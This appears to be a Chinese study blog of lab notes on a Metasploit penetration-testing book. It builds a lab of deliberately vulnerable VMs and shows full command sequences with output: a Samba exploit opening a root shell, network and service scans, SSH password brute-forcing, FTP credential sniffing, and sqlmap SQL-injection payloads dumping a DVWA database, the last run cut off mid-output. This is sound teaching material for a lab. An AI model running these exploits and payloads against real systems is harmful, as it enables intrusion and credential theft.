《Metasploit渗透测试魔鬼训练营》学习笔记_rtkgw.bbrouter

Metasploit渗透测试魔鬼训练营学习笔记

法律常识

《中华人民共和国网络安全法》已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过，现予公布，自2017年6月1日起施行。
第二十条　国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训，采取多种方式培养网络安全人才，促进网络安全人才交流。
第二十七条　任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。
第四十四条　任何个人和组织不得窃取或者以其他非法方式获取个人信息，不得非法出售或者非法向他人提供个人信息。
第四十六条　任何个人和组织应当对其使用网络的行为负责，不得设立用于实施诈骗，传授犯罪方法，制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组，不得利用网络发布涉及实施诈骗，制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。
第四十八条　任何个人和组织发送的电子信息、提供的应用软件，不得设置恶意程序，不得含有法律、行政法规禁止发布或者传输的信息。

前言

本篇学习笔记主要涉及《Metasploit渗透测试魔鬼训练营》实验，原理篇见原书和其他文章。因阅读《Metasploit渗透测试魔鬼训练营》时发现有些实验方法与当前年份无法匹配，故撰写该篇学习笔记，如Back Track5已经停止维护现为Kali Linux，Kali Linux虚拟机占用资源远超于Windows应用Kali Linux占用资源等。

环境准备

环境概览

环境下载

链接: https://pan.baidu.com/s/1I-OkdUcTwEx-TDoTT29hsw?pwd=rjpi
提取码: rjpi

环境部署

vmware虚拟网络编辑器配置

虽然所有靶机的地址应为DHCP获取，但是为了方便与书中保持一致，还是暂时配置为Static地址

Linux Metasploitable网络配置

vi /etc/network/interfaces
1

auth l0
iface l0 inet loopback

auto eth0
iface eth0 inet static
address 10.10.10.254
netmask 255.255.255.0

auto eth1
iface eth1 inet static
address 192.168.10.254
netmask 255.255.255.0
1
2
3
4
5
6
7
8
9
10
11
12

ifdown eth0
ifdown eth0
1
2

ifup eth0
ifup eth1
1
2

WinXP Metasploitable网络配置

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.254
1
2
3
4
5
6
7

OWASP BWA网络配置

vi /etc/network/interfaces
1

auto l0
iface l0 inet loopback

auto eth0
iface eth0 inet static
address 10.10.10.129
netmask 255.255.255.0
gateway 10.10.10.254
1
2
3
4
5
6
7
8

ifdown eth0
1

ifup eth0
1

Win2K3 Metasploitable网络配置

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.254
1
2
3
4
5
6
7

网络配置成功标志

网络配置成功标志为每台设备都能ping通其他的所有地址，若单向能ping通，但双向ping不通可能是主机的防火墙策略拦截，属正常现象

ping 192.168.10.254
ping 10.10.10.254
ping 192.168.10.128
ping 10.10.10.128
ping 10.10.10.129
ping 10.10.10.130
1
2
3
4
5
6

对于环境中的IP均有相关的DNS域名配置信息，配置hosts文件配置对应的IP和域名解析情况
备注：在修改hosts文件前，要将属性中的只读勾选去掉，同时添加Everyone完全控制权限，在修改完成后将只读勾选，同时删除Everyone用户

notepad C:\Windows\System32\drivers\etc\hosts
1

10.10.10.128	attacker.dvssc.com
10.10.10.129	www.dvssc.com
10.10.10.130	service.dvssc.com
10.10.10.254	gate.dvssc.com
192.168.10.128	intranet1.dvssc.com
1
2
3
4
5

Windows 10宿主机安装Metasploit/Kali Linux

下载Metasploit，双击msi文件运行后安装默认位置即可，配置环境变量c:/metasploit-framework
https://windows.metasploit.com/

或者在Windows 10应用商店中下载Kali Linux（亲测Kali Linux因网络配置原因无法使用辅助模块扫描等操作，推荐直接安装Metasploit，使用Kali Linux环境安装其他有且仅能Kali Linux环境安装的应用）

参考链接：
https://zhuanlan.zhihu.com/p/462187821
https://baijiahao.baidu.com/s?id=1689395460377352647&wfr=spider&for=pc
https://blog.csdn.net/qq_44159028/article/details/114635276

初识msfconsole

运行msfconsole

msfconsole
1

PS C:\Users\IDEA> msfconsole
C:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
                                              `:oDFo:`
                                           ./ymM0dayMmy/.
                                        -+dHJ5aGFyZGVyIQ==+-
                                    `:sm⏣~~Destroy.No.Data~~s:`
                                 -+h2~~Maintain.No.Persistence~~h+-
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
                       -++SecKCoin++e.AMd`       `.-:/+hbove.913.ElsMNh+-
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:
                      :we're.all.alike'`                     The.PFYroy.No.D7:
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:
                      :---srwxrwx:-.`                        `MS146.52.No.Per:
                      :<script>.Ac816/                        sENbove3101.404:
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:
                      :09.14.2011.raid                       /STFU|wall.No.Pr:
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:
                      :#OUTHOUSE-  -s:                       /corykennedyData:
                      :$nmap -oS                              SSo.6178306Ence:
                      :Awsm.da:                            /shMTl#beats3o.No.:
                      :Ring0:                             `dDestRoyREXKC3ta/M:
                      :23d:                               sSETEC.ASTRONOMYist:
                       /-                        /yo-    .ence.N:(){ :|: & };:
                                                 `:Shall.We.Play.A.Game?tron/
                                                 ```-ooy.if1ghtf0r+ehUser5`
                                               ..th3.H1V3.U2VjRFNN.jMh+.`
                                              `MjM~~WE.ARE.se~~MMjMs
                                               +~KANSAS.CITY's~-`
                                                J~HAKCERS~./.`
                                                .esc:wq!:`
                                                 +++ATH`
                                                  `


       =[ metasploit v6.1.38-dev-c252faf9388449dd3af4f0ab1288c0ce82fe4cf9]
+ -- --=[ 2212 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 615 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up
to a file, use the makerc command

msf6 >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

使用msfconsole

msf6 > search samba
1

msf6 > use multi/samba/usermap_script
1

msf6 exploit(multi/samba/usermap_script) > show payloads
1

msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
1

msf6 exploit(multi/samba/usermap_script) > show options
1

msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.254
1

msf6 exploit(multi/samba/usermap_script) > exploit
1

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
1
2
3
4

在MSF终端里看到了“Command shell session 1 opened”的成功信息，这时可以输入一些Shell命令，如uname -a和whoami，来查看所控制的目标主机操作系统类型，以及所拥有的用户账户权限

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:a8:c8:7a brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.254/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fea8:c87a/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:a8:c8:84 brd ff:ff:ff:ff:ff:ff
    inet 192.168.10.254/24 brd 192.168.10.255 scope global eth1
    inet6 fe80::20c:29ff:fea8:c884/64 scope link
       valid_lft forever preferred_lft forever
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

模拟环境渗透测试

以下环节摒除正规渗透测试环境中的项目管理内容等，仅单纯利用Metasploit的各类模块对模拟环境进行渗透测试。

modules
    ├─auxiliary  # 辅助模块
    ├─encoders  # 编码工具模块
    ├─evasion  # 混淆模块
    ├─exploits  # 渗 透模块
    ├─nops  # 空模块
    ├─payloads  # 攻击载荷模块
    └─post  # 后期渗透模块
1
2
3
4
5
6
7
8

情报搜集

Metasploit为渗透测试的信息搜集环境提供了大量的辅助模块支持，包括针对各种网络服务的扫描与查点、构建虚假服务收集登录口令、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息，从而发起更具目标性的精准攻击。
Metasploit位于情报搜集阶段主要利用auxiliary（辅助模块）。
auxiliary（辅助模块）：包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。

nslookup查询域名解析情况

msf6 > nslookup www.dvssc.com
[*] exec: nslookup www.dvssc.com

服务器:  RTK_GW.bbrouter
Address:  192.168.1.1

非权威应答:
名称:    hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
Addresses:  54.209.32.212
          52.71.57.184
Aliases:  www.dvssc.com
          traff-1.hugedomains.com
1
2
3
4
5
6
7
8
9
10
11
12

whois

https://whois.chinaz.com/
1

使用dir_scanner辅助模块搜索网站目录

msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts www.dvssc.com
rhosts => www.dvssc.com
msf6 auxiliary(scanner/http/dir_scanner) > exploit

[-] Warning: The Windows platform cannot reliably support more than 16 threads
[-] Thread count has been adjusted to 16
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+][+][+][+][+] Found http://www.dvssc.com:80/001/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/3/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/0001/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/0/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/00001/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/1000/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/11/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/111/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/10/ 503 (10.10.10.129)
[+][+][+][+][+] Found http://www.dvssc.com:80/04/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/123/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1111/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/007/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/123321/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/123123/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1337/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/2/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/777/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/6/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/5/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/666/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/8/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/7/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/606/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/4/ 503 (10.10.10.129)
[+][+] Found http://www.dvssc.com:80/911911/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/9/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/administrator/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cache/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cgi-bin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/components/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/css/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/doc/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/f/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/gallery2/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/ghost/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/icons/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/images/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/includes/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/installation/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/javascript/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/js/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/libraries/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/language/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/login/ 500 (10.10.10.129)
[+] Found http://www.dvssc.com:80/logs/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/media/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/modules/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/plugins/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/templates/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/tmp/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/wordpress/ 200 (10.10.10.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/dir_scanner) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

使用arp_sweep模块探查活跃主机

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run
1
2
3
4

在MSF终端中运行Nmap扫描工具

msf6 > nmap 10.10.10.0/24
1

使用Nmap进行活跃主机探则

msf6 > nmap -Pn 10.10.10.0/24
1

使用Nmap探测目标主机的操作系统版本

msf6 > nmap -O 10.10.10.0/24
1

Telnet服务扫描

msf6 > use auxiliary/scanner/telnet/telnet_version
msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/telnet/telnet_version) > set threads 100
msf6 auxiliary(scanner/telnet/telnet_version) > run
1
2
3
4

SSH服务扫描

search ssh_version
1

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 100
msf6 auxiliary(scanner/ssh/ssh_version) > run
1
2
3
4

search ssh_login
1

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set RPORT 22
set STOP_ON_SUCCESS false
set BLANK_PASSWORDS true
set USER_FILE "c:\resource\user.txt"
set PASS_FILE "c:\resource\pass.txt"
1
2
3
4
5
6
7

Oracle服务扫描

msf6 > use auxiliary/scanner/oracle/tnslsnr_version
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set threads 50
msf6 auxiliary(scanner/oracle/tnslsnr_version) > run
1
2
3
4

SSH服务弱口令探测

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.254
msf6 auxiliary(scanner/ssh/ssh_login) > set uesrname root
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/words.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set thread 50
msf6 auxiliary(scanner/ssh/ssh_login) > run
1
2
3
4
5
6

通过嗅探获取FTP用户名和口令

msf6 > use auxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > run
1
2

Nessus网络漏洞扫描

详情阅读另一篇CentOS Docker环境部署Nessus

渗透攻击

Metasploit利用目标系统安全漏洞入侵系统并获得访问控制权。Metasploit位于渗透攻击阶段主要利用exploit（渗透模块）、payload（安全载荷模块）。
exploit（渗透模块）：是一段程序，运行时会利用目标的安全漏洞进行安全测试。
payload（安全载荷模块）：在成功对目标完成一次渗透测试，payload将在目标机器运行，帮助我们获取目标上需要的访问和运行权限。

Web应用渗透

SQL注入

Sqlmap扫描
Metasploit中没有Sqlmap模块了，需要直接安装Sqlmap
python3直接在Windows10应用商店中安装

https://sqlmap.org/
下载解压重命名为sqlmap放置到c目录下python c:/sqlmap/sqlmap.py+参数直接执行

http://10.10.10.129/dvwa/login.php
1

uesrname:admin
password:admin
1
2

选择Damn Vulnerable Web Application
设置DVWA Security为low

选择SQL Injection

python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
1

PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:21:13 /2022-04-14/

[21:21:14] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q]

[21:21:15] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow? [Y/n]

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9547p2gdpmv...u0t9jme0i1;security=high;security=high'). Do you want to use those [Y/n]

[21:21:17] [INFO] testing if the target URL content is stable
[21:21:17] [WARNING] URI parameter '#1*' does not appear to be dynamic
[21:21:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[21:21:17] [INFO] testing for SQL injection on URI parameter '#1*'
[21:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:21:17] [WARNING] reflective value(s) found and filtering out
[21:21:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:21:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:21:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:21:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:21:17] [INFO] testing 'Generic inline queries'
[21:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:21:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:21:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:21:18] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[21:21:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:21:19] [WARNING] URI parameter '#1*' does not seem to be injectable
[21:21:19] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:21:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 72 times

[*] ending @ 21:21:19 /2022-04-14/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

Sqlmap提示信息，它还是希望我们对于GET请求或POST请求提供参数，故添加参数

you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself?
1
2

Sqlmap提示信息，它表示在测试过程会302重定向到登录界面，故添加Cookie保持登录状态

testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow?
1
2

Sqlmap提示信息，它表示暂时没有发现注入点，是否要减少请求数量

it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?
1

打开F12调试器刷新界面点击任意请求查看Cookie信息

python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
1

PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:47:37 /2022-04-14/

[21:47:37] [INFO] resuming back-end DBMS 'mysql'
[21:47:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 8674=8674#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:47:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:47:37] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'

[*] ending @ 21:47:37 /2022-04-14/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

Sqlmap提示信息，数据库为MySQL数据库

resuming back-end DBMS 'mysql'
1

Sqlmap提示信息，注入点为Parameter: id (GET)

Parameter: id (GET)
1

Sqlmap提示信息，SQL注入类型为Boolean注入、报错注入、时间注入、Union注入

Type: boolean-based blind
Type: error-based
Type: time-based blind
Type: UNION query
1
2
3
4

Sqlmap提示信息，payload

Payload: id=1' OR NOT 8674=8674#&Submit=Submit
Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
1
2
3
4

添加dump参数获取数据库数据，测试环境数据量小能够直接dump，数据量大要逐步查询数据库database、数据表table、数据字段columns、数据data，分别使用参数dbs、tables、columns、dump

python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
1

PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:58 /2022-04-14/

[21:57:58] [INFO] resuming back-end DBMS 'mysql'
[21:57:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 8674=8674#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:57:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
[21:57:58] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:57:58] [INFO] fetching current database
[21:57:58] [INFO] fetching tables for database: 'dvwa'
[21:57:58] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
[21:57:58] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[21:57:58] [INFO] table 'dvwa.guestbook' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\guestbook.csv'
[21:57:58] [INFO] fetching columns for table 'users' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'users' in database 'dvwa'
[21:57:58] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

do you want to crack them via a dictionary-based attack? [Y/n/q]

[21:58:04] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
